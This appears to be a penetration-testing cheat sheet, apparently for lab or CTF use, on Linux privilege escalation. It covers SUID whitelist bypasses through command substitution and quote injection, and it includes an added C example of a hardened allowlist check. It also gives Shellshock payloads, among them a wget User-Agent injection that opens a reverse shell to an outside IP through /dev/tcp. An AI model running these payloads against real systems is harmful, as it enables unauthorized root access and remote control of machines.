Binary Exploitation - Linux
Bypass SUID whitelist
Sometimes SUID commands restrict what they will run to a whitelist of commands. This can be bypassed by using subcommands (command substitution):
supershell '/bin/ls $(cat /root/root.txt)'
In this example, supershell is the SUID binary and /bin/ls is the whitelisted command. There is also another way to bypass this, by using ' to open a quote:
supershell '/bin/ls
Then in the next line use your desired command:
cat /root/root.txt'
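Why both bypasses get through, and a check that rejects them, as an added example that is not code from this page. The source of supershell is not shown, so the prefix-match behaviour of weak_check is an assumption, as are the function names and the allowlist contents.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical allowlist; the page names only /bin/ls. */
static const char *const ALLOWED[] = { "/bin/ls", NULL };

/* ASSUMED weak check: accept anything that starts with an allowed path.
   If the string then goes to a shell, $(...) and a newline inside the
   quoted argument both run extra commands with the SUID identity. */
int weak_check(const char *cmd) {
    for (size_t i = 0; ALLOWED[i]; i++)
        if (strncmp(cmd, ALLOWED[i], strlen(ALLOWED[i])) == 0) return 1;
    return 0;
}

/* Hardened check: refuse every byte a shell would interpret, split on
   blanks into argv, and require argv[0] to equal an allowed path exactly.
   Returns argc on success, 0 on rejection. Modifies cmd in place. */
int strict_parse(char *cmd, char *argv[], int max) {
    int argc = 0;
    if (strpbrk(cmd, "$`;&|<>(){}\\\"'\n\r*?~!#")) return 0;
    for (char *t = strtok(cmd, " \t"); t; t = strtok(NULL, " \t")) {
        if (argc >= max - 1) return 0;
        argv[argc++] = t;
    }
    argv[argc] = NULL;
    if (argc == 0) return 0;
    for (size_t i = 0; ALLOWED[i]; i++)
        if (strcmp(argv[0], ALLOWED[i]) == 0) return argc;
    return 0;
}

int main(int argc, char **argv) {
    char *args[16];
    char *envp[] = { "PATH=/usr/bin:/bin", NULL };  /* drop caller's environment */
    if (argc != 2 || !strict_parse(argv[1], args, 16)) {
        fputs("rejected\n", stderr);
        return 1;
    }
    execve(args[0], args, envp);  /* direct exec: nothing re-parses the arguments */
    perror("execve");
    return 1;
}
```

Arguments that pass the check still reach the allowed program, so a wrapper that must also limit options or paths needs its own rules for them.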
Exploit pkexec
pkexec
Shellshock
Attack vectors include remote command execution via CGI scripts or web servers, as well as exploitation in environments like SSH, HTTP, and any process that involves Bash interpreting environment variables. Affects Bash versions 1.x to 4.3:
() { :;}; echo; /usr/bin/id
Inject malicious code through the User-Agent header, targeting a vulnerable CGI script in the /cgi-bin/ directory to initiate a reverse shell:
wget -U '() { :;}; echo; /bin/bash >& /dev/tcp/172.24.0.253/4443 0>&1' -O- http://172.24.0.2/cgi-bin/stats